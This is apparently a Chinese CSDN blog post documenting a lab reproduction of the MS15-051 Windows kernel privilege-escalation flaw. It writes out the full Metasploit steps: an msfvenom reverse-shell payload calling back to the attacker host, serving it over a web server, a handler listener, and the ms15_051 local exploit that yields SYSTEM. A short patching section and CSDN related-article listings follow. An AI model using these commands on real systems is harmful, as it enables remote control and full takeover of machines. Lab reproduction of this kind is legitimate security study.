MS15-051漏洞利用与修复

最新推荐文章于 2023-02-04 21:05:21 发布
最新推荐文章于 2023-02-04 21:05:21 发布
阅读量650 收藏 2
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45716477/article/details/118440406
版权

文章目录

环境

机器系统IP
攻击机Kali 2021.2192.168.45.135
靶机Windows Server 2008 32位192.168.45.138

工具

Metasploit | Xampp

利用步骤

0x00 生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.135 lport=4444 -f exe > shell.exe

在这里插入图片描述

0x01 将木马上传至服务器

cd /opt/lampp/htdocs
mkdir shell
mv /root/shell.exe /opt/lampp/htdocs/shell/
/opt/lampp/lampp restart

访问192.168.45.135/shell即可下载木马。
在这里插入图片描述

0x02 开始攻击

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.45.135
set lport 4444
exploit

在靶机上访问192.168.45.135/shell下载木马并运行,攻击机成功获取反弹。

在这里插入图片描述

0x03 利用漏洞提权

background
search ms15-051 #寻找MS15-051的利用模块
use exploit/windows/local/ms15_051_client_copy_image
set payload windows/meterpreter/reverse_tcp
set session 1
set lhost 192.168.45.135
set lport 4444
run

在这里插入图片描述
成功获得了system权限,提权成功。

0x04 漏洞修复

1.安装微软MS15-051安全补丁。
2.使用360安全卫士的win32k内核函数接管处理。

quantum_(*/ω\*)
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ms15-051利用工具
02-04
MS15-051攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。受影响软件windows2003/windows2008/windows2012/windows7/windows8.1
MS15-051(CVE-2015-1701)漏洞复现
EC_Carrot的博客
03-30 1684
漏洞背景 Win32k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞,成功利用此漏洞可使攻击者在内核模式中运行任意代码。攻击者必须具有有效的登录凭证,并且可以本地登录以利用此漏洞。远程或匿名用户无法利用此漏洞。 相应补丁号为:3045171 影响范围 Microsoft Windows Vista Microsoft Windows Server 2012 R2 Microsoft Windows Server 2012 Microsoft Windows Server 2008
MS15-034-Scanner:支持通过http和https扫描MS15-034漏洞的应用程序
05-16
MS15-034-扫描仪 MS15-034-Scanner是Windows命令行实用程序,它扫描[MS15-034]( )漏洞的一个或多个URL。以非破坏性的方式 该实用程序使用原始套接字来执行扫描,从而绕过大多数本机.NET Web浏览器或客户端(阻止访问关键标头值)固有的限制。 此外,此解决方案通过标头操作提供了完全的SSL支持。 调用不带参数的实用程序以查看选项。 接受一个或多个要扫描的URL的列表。 每个url应该完全合格,可以包含h​​ttp或https,可以使用备用端口,并且可以包含虚拟目录或子站点。 用法 该实用程序会发出屏幕上的进度详细信息,并将详细的扫描结果记录到日志文件(CSV)中。 执照
MS15-051 修正版Exploit(Webshell可用)-附件资源
03-05
MS15-051 修正版Exploit(Webshell可用)-附件资源
Trebuchet:MS15-076权限提升
05-08
投石机 ##### MS15-076(CVE-2015-2370)特权升级######将文件复制到磁盘上的任何特权位置 与VS2015一起编译,已在Binary目录中预编译exe 用法:trebuchet.exe C:\ Users \ Bob \ Evil.txt C:\ Windows \ System32 \ Evil.dll 这是James Forshaw与Google一起对概念证明进行的略微修改,可在以下位置找到: : id CreateSymlink工具由James Forshaw编写,位于以下位置: : 笔记: Microsoft.VisualStudio.OLE.Inerop.dll必须在同一目录中 漏洞利用只能每2-3分钟一次。 这是因为RPC可以由LocalSystem阻止 目标文件不存在 在x64 / x86 Windows 7 / 8.1上测试
ms15-051提权
A_dmin的博客
09-14 4004
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会m...
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2212
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
Metasploit利用ms15-051漏洞进行权限提权
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-01 3617
Metasploit利用ms15-051漏洞进行权限提权 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
linux 1701权限,Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)
weixin_42227736的博客
04-30 157
Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)发布日期:2015-05-12更新日期:2015-05-14受影响系统:Microsoft Windows VistaMicrosoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008...
【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权
weixin_45588247的博客
07-27 2966
MS15-051简介 Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。 漏洞影响的操作系统有 Windows Server 2003 Windows Vista Windows Server 2008 Win.
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
MS15-051提权EXP
08-09
MS15-051提权EXP,
MS15-010提权神器
09-24
MS15-010提权神器.shell提权,2015最新提权
ms15-015.zip
07-08
由于是逻辑漏洞,无论如何都不可能蓝屏,同时也没有32位64位一说,一个exe通吃。能影响2012和2012 r2,可能是这个漏洞相对于MS15-051而言最好的一点。
行政数据分析看板8.xlsx
04-26
Excel数据看板,Excel办公模板,Excel模板下载,Excel数据统计,数据展示
自动驾驶运动规划(Motion Planning).pdf
04-26
自动驾驶运动规划(Motion Planning)问题分析
跟我一起写makefile
最新发布
04-26
跟我一起写makefile的PDF,学习用。
AI 技术落地有望强化客户运 营.pdf
04-26
AI 技术落地有望强化客户运 营.pdf
ms15-034修复打补丁
08-31
您好!针对 ms15-034 的修复,您可以通过以下步骤来打补丁: 1. 首先,确保您的系统已经安装了最新的安全补丁。您可以在微软官方网站上查找并下载相应的补丁程序。 2. 下载适用于您的操作系统和架构的修复补丁。微软通常会提供适用于不同操作系统版本和架构(32位或64位)的修复补丁。 3. 在下载补丁之前,建议先备份您的系统和关键数据,以防意外情况发生。 4. 下载完补丁后,双击运行补丁程序,并按照提示完成安装过程。 5. 安装完成后,重新启动系统以使修复生效。 请注意,在打补丁前,请确保您从可信赖的来源下载补丁,并且在安装之前备份数据,以避免潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值